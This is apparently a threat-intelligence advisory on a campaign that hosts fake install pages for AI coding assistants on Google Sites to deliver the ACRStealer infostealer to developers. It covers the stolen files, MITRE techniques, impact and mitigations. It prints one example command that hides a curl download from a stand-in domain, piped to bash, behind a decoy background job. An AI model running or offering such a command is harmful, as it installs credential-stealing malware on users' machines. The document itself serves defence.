Fake AI Coding Assistant Installers on Google Sites Lure Developers with Infostealer

Executive Summary

A malware campaign, active since at least March 2026, is targeting software developers with a sophisticated social engineering scheme. Attackers are creating fake download pages for popular AI coding assistants, including Anthropic's Claude Code and OpenAI Codex, and hosting them on Google Sites. This tactic leverages the trusted Google domain to appear legitimate and evade security blocklists. Developers are tricked into executing a seemingly harmless installation command from their terminal. However, the command contains a hidden instruction that downloads and runs ACRStealer, an information-stealing malware variant specifically tailored to harvest developer secrets, API keys, and cryptocurrency wallets.

Threat Overview

The attack preys on the developer community's increasing reliance on AI coding tools. The threat actors create convincing, but fake, landing pages on sites.google.com. When a developer visits one of these pages, they are presented with a one-line command to copy and paste into their terminal for a supposed easy installation.

The malicious command uses a clever trick: a single ampersand (&) character. In Unix-like shells, & allows a command to run in the background while the shell immediately moves to the next command. The attackers construct the command so that a legitimate-looking (but fake) process runs in the foreground, while a malicious script is downloaded and executed silently in the background.

# Example of the malicious command structure
(echo 'Installation in progress...'); sleep 5 & curl -s http://malicious-domain.com/payload.sh | bash

Technical Analysis

The payload delivered in this campaign is a new variant of ACRStealer (sometimes called Amatera), an infostealer first observed in 2025. This version has been specifically updated to target developers using AI tools.

• Targeted File Theft: The malware actively searches for and steals configuration and secret files from AI assistant tools, including:
  • secrets.json (from Cline)
  • config.yaml (from Continue.dev)
• Credential Harvesting: Beyond AI-specific files, it performs standard infostealer functions, such as stealing:
  • Saved browser passwords and cookies
  • Cryptocurrency wallet files
• Exfiltration: All stolen data is packaged and sent to an attacker-controlled server within seconds of the compromise.

This attack maps to several MITRE ATT&CK techniques:

• T1204.002 - User Execution: Malicious Link: The user is socially engineered to visit the malicious Google Site.
• T1059.004 - Command and Scripting Interpreter: Unix Shell: The core of the attack relies on the user executing a malicious shell command.
• T1555 - Credentials from Password Stores: A primary function of the ACRStealer payload.
• T1539 - Steal Web Session Cookie: Another key function of the infostealer.

Impact Assessment

The compromise of a developer's machine can have catastrophic consequences:

• Supply Chain Contamination: Stolen API keys and credentials can be used to inject malicious code into source code repositories, leading to a wider software supply chain attack.
• Corporate Espionage: Attackers can gain access to proprietary code and internal systems.
• Financial Theft: Direct theft of cryptocurrency and unauthorized use of cloud services using stolen API keys can lead to significant financial loss.
• Identity Theft: Stolen browser passwords can lead to the compromise of numerous other personal and professional accounts.

IOCs — Directly from Articles

No specific domains or file hashes were provided in the source articles.

Cyber Observables — Hunting Hints

The following patterns could indicate related activity:

Detection & Response

1. Developer Education: Train developers to be extremely cautious about commands copied from the internet. They should understand the function of every part of a command before executing it.
2. EDR Monitoring: Use an Endpoint Detection and Response (EDR) solution to monitor terminal activity. Create alerts for suspicious command patterns, such as piping curl to a shell.
3. Network Egress Filtering: Block outbound connections from developer workstations to unknown or uncategorized domains, which can prevent both payload download and data exfiltration.

Mitigation

1. Never Trust, Always Verify: The most important mitigation is cultural. Developers should never blindly copy and paste commands from unofficial sources, even if they appear to be hosted on a trusted domain like Google Sites.
2. Use Official Sources: Always download software and obtain installation commands from the official project website or a trusted package manager.
3. Principle of Least Privilege: Run terminal commands as a non-privileged user whenever possible to limit the potential damage a malicious script can do.
4. Credential Management: Use dedicated secret management tools like HashiCorp Vault instead of storing secrets in plaintext files, and use hardware tokens for storing cryptocurrency assets.